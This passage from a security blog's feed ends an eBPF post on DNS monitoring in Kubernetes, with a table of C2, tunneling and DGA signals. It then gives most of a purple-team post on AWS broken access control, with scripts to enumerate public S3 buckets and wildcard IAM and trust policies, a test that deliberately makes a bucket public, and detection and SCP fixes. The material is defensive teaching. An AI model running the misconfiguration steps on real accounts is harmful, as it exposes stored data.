<p><strong>DNS over TCP is a separate code path.</strong> Most DNS queries are UDP. Large responses (&gt;512 bytes) or DNSSEC responses may trigger TCP fallback. The <code class="" data-line="">sendto</code> tracepoint catches UDP; for TCP DNS, you&#8217;d need <code class="" data-line="">tcp_sendmsg</code> with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.</p>
<p><strong>glibc caching means not every <code class="" data-line="">getaddrinfo()</code> generates a DNS query.</strong> glibc caches resolved hostnames in the process&#8217;s memory. A service that calls <code class="" data-line="">getaddrinfo(&quot;api.example.com&quot;)</code> every 100ms may only generate a DNS query every 30 seconds (the TTL). If you&#8217;re looking for which pods are resolving a domain and see only occasional tracepoint hits, that&#8217;s expected — it&#8217;s the cache miss rate, not the access rate.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>All DNS queries on a node</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }&#039;</code></td>
</tr>
<tr>
<td>DNS query count per process</td>
<td><code class="" data-line="">bpftrace -e &#039;... { @[comm] = count(); }&#039;</code></td>
</tr>
<tr>
<td>DNS queries from a specific process</td>
<td><code class="" data-line="">bpftrace -e &#039;... /comm == &quot;my-svc&quot;/ { ... }&#039;</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID → <code class="" data-line="">kubectl get pods</code></td>
</tr>
<tr>
<td>DNS events with domain names (Tetragon)</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>DNS policy violations (Cilium)</td>
<td><code class="" data-line="">hubble observe --verdict DROPPED --protocol DNS</code></td>
</tr>
<tr>
<td>CoreDNS query logs</td>
<td><code class="" data-line="">kubectl logs -n kube-system -l k8s-app=kube-dns</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>DNS signal</th>
<th>What it indicates</th>
</tr>
</thead>
<tbody>
<tr>
<td>New domain, immediate TCP connect</td>
<td>Possible C2 resolution</td>
</tr>
<tr>
<td>50+ queries/second from one PID</td>
<td>DNS tunneling candidate</td>
</tr>
<tr>
<td>Query to non-cluster domain from batch job</td>
<td>Unusual — investigate</td>
</tr>
<tr>
<td>NXDOMAIN responses at high rate</td>
<td>Misconfiguration or DGA</td>
</tr>
<tr>
<td>Queries from PID not matching any known binary</td>
<td>Injected process</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF uses the <code class="" data-line="">sendto</code> tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar</li>
<li>CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives</li>
<li>The DNS syscall path goes: <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the <code class="" data-line="">sendto()</code> boundary</li>
<li>A compromised workload&#8217;s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log</li>
<li>glibc caches resolved names, so tracepoint hit rate reflects cache misses, not <code class="" data-line="">getaddrinfo()</code> call rate — account for this when baselining</li>
<li>Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie do this in their eBPF programs; bpftrace one-liners detect the query event without the domain string</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.</p>
<p>LSM hooks and Tetragon&#8217;s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no &#8220;detect and respond&#8221; window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.</p>
<p><em>Next: <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon — when the kernel says no</a></em></p>
<p>Get EP12 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&#038;title=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" data-a2a-url="https://linuxcent.com/ebpf-dns-observability-kubernetes/" data-a2a-title="DNS at the Kernel Level — What Your Pods Are Actually Resolving"></a></p><p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-dns-observability-kubernetes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1840</post-id>	</item>
		<item>
		<title>Broken Access Control in AWS: From Misconfigured S3 to Admin</title>
		<link>https://linuxcent.com/broken-access-control-aws-cloud/</link>
					<comments>https://linuxcent.com/broken-access-control-aws-cloud/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 04 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Broken Access Control]]></category>
		<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[IAM]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[S3]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1852</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Broken access control is OWASP A01 because it is the most common cloud failure. How IAM wildcards, public S3 buckets, and overpermissioned roles create admin-level exposure.</p>
<p>The post <a href="https://linuxcent.com/broken-access-control-aws-cloud/">Broken Access Control in AWS: From Misconfigured S3 to Admin</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <strong>Broken access control in AWS</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>Broken access control in AWS</strong> is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies</li>
<li>A public S3 bucket containing 47 million customer records went undetected for six months in an authorized assessment — no GuardDuty finding, no AWS Config alert, because those controls weren&#8217;t enabled</li>
<li>The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account</li>
<li>The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings</li>
<li>The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts</li>
<li>Cross-series: <a href="/aws-iam-privilege-escalation-passrole/">IAM privilege escalation paths</a> (IAM EP08) and <a href="/aws-least-privilege-audit/">AWS least privilege audit</a> (IAM EP09) go deeper on the IAM layer</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────&#x25b6;  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────&#x25b6;  IAM user with &quot;Action&quot;: &quot;*&quot;             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────&#x25b6;  Trust policy: &quot;AWS&quot;: &quot;*&quot;                │
│   (any AWS account)          └── assume role from attacker&#039;s        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>Broken access control in AWS</strong> is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.</p>
<hr />
<h2 id="the-assessment-that-changed-my-approach-to-access-control-auditing">The Assessment That Changed My Approach to Access Control Auditing</h2>
<p>During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.</p>
<p>The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a <code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code> finding when public access is enabled, but only if the finding is new during GuardDuty&#8217;s monitoring window. The bucket went public before GuardDuty was enabled.</p>
<p>No alert ever fired. Not because the tools couldn&#8217;t detect it — because the tools weren&#8217;t configured to look.</p>
<p>This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.</p>
<hr />
<h2 id="red-phase-how-broken-access-control-works-in-practice">Red Phase: How Broken Access Control Works in Practice</h2>
<p>The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn&#8217;t be able to reach?</p>
<h3 id="enumerating-public-s3-buckets">Enumerating Public S3 Buckets</h3>
<pre><code class="" data-line="">aws s3api list-buckets --query &#039;Buckets[].Name&#039; --output text | \
  tr &#039;\t&#039; &#039;\n&#039; | \
  while read bucket; do
    # Check account-level block
    account_block=$(aws s3control get-public-access-block \
      --account-id $(aws sts get-caller-identity --query Account --output text) \
      2&gt;/dev/null | jq -r &#039;.PublicAccessBlockConfiguration.BlockPublicAcls&#039;)

    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket &quot;$bucket&quot; 2&gt;/dev/null | \
      jq -r &#039;.PolicyStatus.IsPublic&#039;)

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket &quot;$bucket&quot; 2&gt;/dev/null | \
      jq -r &#039;.Grants[] | select(.Grantee.URI == &quot;http://acs.amazonaws.com/groups/global/AllUsers&quot;) | .Permission&#039;)

    if [ &quot;$policy&quot; = &quot;true&quot; ] || [ -n &quot;$acl&quot; ]; then
      echo &quot;PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)&quot;
    fi
  done
</code></pre>
<h3 id="enumerating-overly-permissive-iam-policies">Enumerating Overly Permissive IAM Policies</h3>
<pre><code class="" data-line=""># Find all customer-managed policies with wildcard actions
aws iam list-policies --scope Local --query &#039;Policies[].Arn&#039; --output text | \
  tr &#039;\t&#039; &#039;\n&#039; | \
  while read arn; do
    version=$(aws iam get-policy --policy-arn &quot;$arn&quot; \
      --query &#039;Policy.DefaultVersionId&#039; --output text)
    doc=$(aws iam get-policy-version --policy-arn &quot;$arn&quot; --version-id &quot;$version&quot; \
      --query &#039;PolicyVersion.Document&#039; --output json)

    if echo &quot;$doc&quot; | jq -e &#039;.Statement[] | select(.Effect == &quot;Allow&quot; and .Action == &quot;*&quot;)&#039; &gt; /dev/null 2&gt;&amp;1; then
      echo &quot;WILDCARD ACTION POLICY: $arn&quot;
      echo &quot;$doc&quot; | jq &#039;.Statement[] | select(.Effect == &quot;Allow&quot; and .Action == &quot;*&quot;)&#039;
    fi
  done
</code></pre>
<h3 id="testing-trust-policy-abuse">Testing Trust Policy Abuse</h3>
<pre><code class="" data-line=""># Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
aws iam list-roles --query &#039;Roles[].{Name:RoleName,Arn:Arn}&#039; --output json | \
  jq -r &#039;.[].Arn&#039; | \
  while read role_arn; do
    trust=$(aws iam get-role --role-name &quot;$(basename $role_arn)&quot; \
      --query &#039;Role.AssumeRolePolicyDocument&#039; --output json 2&gt;/dev/null)

    # Check for wildcard principals
    if echo &quot;$trust&quot; | jq -e &#039;.Statement[] | select(.Principal == &quot;*&quot;)&#039; &gt; /dev/null 2&gt;&amp;1; then
      echo &quot;WILDCARD TRUST PRINCIPAL: $role_arn&quot;
    fi

    # Check for cross-account trust without conditions
    if echo &quot;$trust&quot; | jq -e &#039;.Statement[] | select(.Principal.AWS | type == &quot;string&quot; and test(&quot;arn:aws:iam::[0-9]+:root&quot;))&#039; &gt; /dev/null 2&gt;&amp;1; then
      account_in_trust=$(echo &quot;$trust&quot; | jq -r &#039;.Statement[] | .Principal.AWS // empty&#039; | grep -oP &#039;(?&lt;=arn:aws:iam::)[0-9]+&#039;)
      current_account=$(aws sts get-caller-identity --query Account --output text)
      if [ &quot;$account_in_trust&quot; != &quot;$current_account&quot; ]; then
        echo &quot;CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust&quot;
      fi
    fi
  done
</code></pre>
<h3 id="simulating-s3-exfiltration-on-your-own-bucket-safe-test">Simulating S3 Exfiltration (on your own bucket — safe test)</h3>
<pre><code class="" data-line=""># Create a test bucket, make it public, verify it&#039;s accessible without credentials
# Do this in a non-production account only

TEST_BUCKET=&quot;purple-team-test-$(date +%s)&quot;
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket &quot;${TEST_BUCKET}&quot; \
  --public-access-block-configuration \
  &quot;BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false&quot;

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket &quot;${TEST_BUCKET}&quot; --policy &#039;{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [{
    &quot;Effect&quot;: &quot;Allow&quot;,
    &quot;Principal&quot;: &quot;*&quot;,
    &quot;Action&quot;: &quot;s3:GetObject&quot;,
    &quot;Resource&quot;: &quot;arn:aws:s3:::&#039;&quot;${TEST_BUCKET}&quot;&#039;/*&quot;
  }]
}&#039;

# Put a test file
echo &quot;PURPLE_TEAM_TEST_DATA&quot; | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it&#039;s accessible without credentials
curl -s &quot;https://${TEST_BUCKET}.s3.amazonaws.com/test.txt&quot;
# Should return: PURPLE_TEAM_TEST_DATA

echo &quot;&quot;
echo &quot;Test complete. Clean up:&quot;
echo &quot;aws s3 rb s3://${TEST_BUCKET} --force&quot;
</code></pre>
<hr />
<h2 id="blue-phase-what-detection-looks-like">Blue Phase: What Detection Looks Like</h2>
<h3 id="what-aws-config-catches">What AWS Config Catches</h3>
<p>Two managed rules cover the majority of S3 broken access control findings:</p>
<pre><code class="" data-line=""># Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule &#039;{
  &quot;ConfigRuleName&quot;: &quot;s3-bucket-public-read-prohibited&quot;,
  &quot;Source&quot;: {
    &quot;Owner&quot;: &quot;AWS&quot;,
    &quot;SourceIdentifier&quot;: &quot;S3_BUCKET_PUBLIC_READ_PROHIBITED&quot;
  },
  &quot;Scope&quot;: {
    &quot;ComplianceResourceTypes&quot;: [&quot;AWS::S3::Bucket&quot;]
  }
}&#039;

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule &#039;{
  &quot;ConfigRuleName&quot;: &quot;s3-account-level-public-access-blocks-periodic&quot;,
  &quot;Source&quot;: {
    &quot;Owner&quot;: &quot;AWS&quot;,
    &quot;SourceIdentifier&quot;: &quot;S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC&quot;
  }
}&#039;

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query &#039;ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}&#039;
</code></pre>
<h3 id="what-guardduty-catches">What GuardDuty Catches</h3>
<p>GuardDuty generates these findings for S3 broken access control:</p>
<table>
<thead>
<tr>
<th>Finding Type</th>
<th>Trigger</th>
<th>Severity</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code></td>
<td>Bucket policy or ACL grants public read/write</td>
<td>Medium</td>
</tr>
<tr>
<td><code class="" data-line="">Policy:S3/BucketPublicAccessGranted</code></td>
<td>Same as above — alternate finding type</td>
<td>Medium</td>
</tr>
<tr>
<td><code class="" data-line="">Discovery:S3/MaliciousIPCaller</code></td>
<td>S3 GetObject from a known malicious IP</td>
<td>High</td>
</tr>
</tbody>
</table>
<pre><code class="" data-line=""># Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query &#039;DetectorIds[0]&#039; --output text)

aws guardduty list-findings \
  --detector-id &quot;${DETECTOR_ID}&quot; \
  --finding-criteria &#039;{
    &quot;Criterion&quot;: {
      &quot;type&quot;: {
        &quot;Equals&quot;: [&quot;Policy:S3/BucketAnonymousAccessGranted&quot;, &quot;Policy:S3/BucketPublicAccessGranted&quot;]
      }
    }
  }&#039; \
  --query &#039;FindingIds&#039; --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id &quot;${DETECTOR_ID}&quot; \
    --finding-ids | \
  jq &#039;.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}&#039;
</code></pre>
<h3 id="what-iam-access-analyzer-catches">What IAM Access Analyzer Catches</h3>
<p>IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).</p>
<pre><code class="" data-line=""># Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name &quot;account-access-analyzer&quot; \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query &#039;analyzers[0].arn&#039; --output text) \
  --filter &#039;{&quot;status&quot;: {&quot;eq&quot;: [&quot;ACTIVE&quot;]}}&#039; \
  --query &#039;findings[].{Resource:resource,Principal:principal,Action:action}&#039; \
  --output table
</code></pre>
<h3 id="what-the-cloudtrail-event-looks-like">What the CloudTrail Event Looks Like</h3>
<p>When an anonymous user accesses a public S3 object:</p>
<pre><code class="" data-line="">{
  &quot;eventVersion&quot;: &quot;1.09&quot;,
  &quot;userIdentity&quot;: {
    &quot;type&quot;: &quot;AWSAccount&quot;,
    &quot;accountId&quot;: &quot;ANONYMOUS_PRINCIPAL&quot;,  
    &quot;principalId&quot;: &quot;ANONYMOUS_PRINCIPAL&quot;
  },
  &quot;eventTime&quot;: &quot;2024-03-15T02:47:00Z&quot;,
  &quot;eventSource&quot;: &quot;s3.amazonaws.com&quot;,
  &quot;eventName&quot;: &quot;GetObject&quot;,
  &quot;requestParameters&quot;: {
    &quot;bucketName&quot;: &quot;your-bucket-name&quot;,
    &quot;key&quot;: &quot;customer-data/records.csv&quot;
  },
  &quot;sourceIPAddress&quot;: &quot;198.51.100.1&quot;,
  &quot;userAgent&quot;: &quot;python-requests/2.28.0&quot;
}
</code></pre>
<p>The signal: <code class="" data-line="">userIdentity.type = &quot;AWSAccount&quot;</code> with <code class="" data-line="">accountId = &quot;ANONYMOUS_PRINCIPAL&quot;</code> on a <code class="" data-line="">GetObject</code> event. This is a read from an anonymous, unauthenticated principal.</p>
<pre><code class="" data-line=""># CloudTrail Insights query (Athena) to find anonymous S3 GetObject events
# Assumes CloudTrail S3 data events are enabled for the bucket

SELECT
  eventTime,
  sourceIPAddress,
  requestParameters.bucketName,
  requestParameters.key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = &#039;GetObject&#039;
  AND userIdentity.type = &#039;AWSAccount&#039;
  AND userIdentity.accountId = &#039;ANONYMOUS_PRINCIPAL&#039;
  AND eventTime &gt; current_timestamp - interval &#039;7&#039; day
ORDER BY eventTime DESC
LIMIT 100;
</code></pre>
<hr />
<h2 id="purple-phase-the-structural-fix">Purple Phase: The Structural Fix</h2>
<p>Detection catches broken access control after the fact. The structural fix prevents it from being possible.</p>
<h3 id="fix-1-account-level-s3-public-access-block">Fix 1: Account-Level S3 Public Access Block</h3>
<p>This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.</p>
<pre><code class="" data-line=""># Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  &quot;BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true&quot;

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)
</code></pre>
<h3 id="fix-2-scp-to-prevent-disabling-the-public-access-block">Fix 2: SCP to Prevent Disabling the Public Access Block</h3>
<p>An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.</p>
<pre><code class="" data-line="">{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Sid&quot;: &quot;DenyS3PublicAccessBlockDisable&quot;,
      &quot;Effect&quot;: &quot;Deny&quot;,
      &quot;Action&quot;: [
        &quot;s3:PutBucketPublicAccessBlock&quot;,
        &quot;s3:DeletePublicAccessBlock&quot;
      ],
      &quot;Resource&quot;: &quot;*&quot;,
      &quot;Condition&quot;: {
        &quot;ArnNotLike&quot;: {
          &quot;aws:PrincipalArn&quot;: &quot;arn:aws:iam::*:role/s3-public-access-exception-role&quot;
        }
      }
    }
  ]
}
</code></pre>
<pre><code class="" data-line=""># Apply the SCP to your organizational unit
aws organizations create-policy \
  --name &quot;DenyS3PublicAccessBlockDisable&quot; \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description &quot;Prevents disabling S3 public access block at account level&quot;
</code></pre>
<h3 id="fix-3-iam-policy-cleanup-remove-wildcards">Fix 3: IAM Policy Cleanup — Remove Wildcards</h3>
<p>For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.</p>
<pre><code class="" data-line=""># Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details &#039;{
    &quot;principalArn&quot;: &quot;arn:aws:iam::123456789012:role/your-role-name&quot;
  }&#039; \
  --cloud-trail-details &#039;{
    &quot;accessRole&quot;: &quot;arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role&quot;,
    &quot;trailProperties&quot;: [{
      &quot;cloudTrailArn&quot;: &quot;arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail&quot;,
      &quot;regions&quot;: [&quot;us-east-1&quot;, &quot;us-west-2&quot;],
      &quot;allRegions&quot;: false
    }],
    &quot;startTime&quot;: &quot;2024-01-01T00:00:00Z&quot;,
    &quot;endTime&quot;: &quot;2024-03-01T00:00:00Z&quot;
  }&#039;

# Retrieve the generated policy
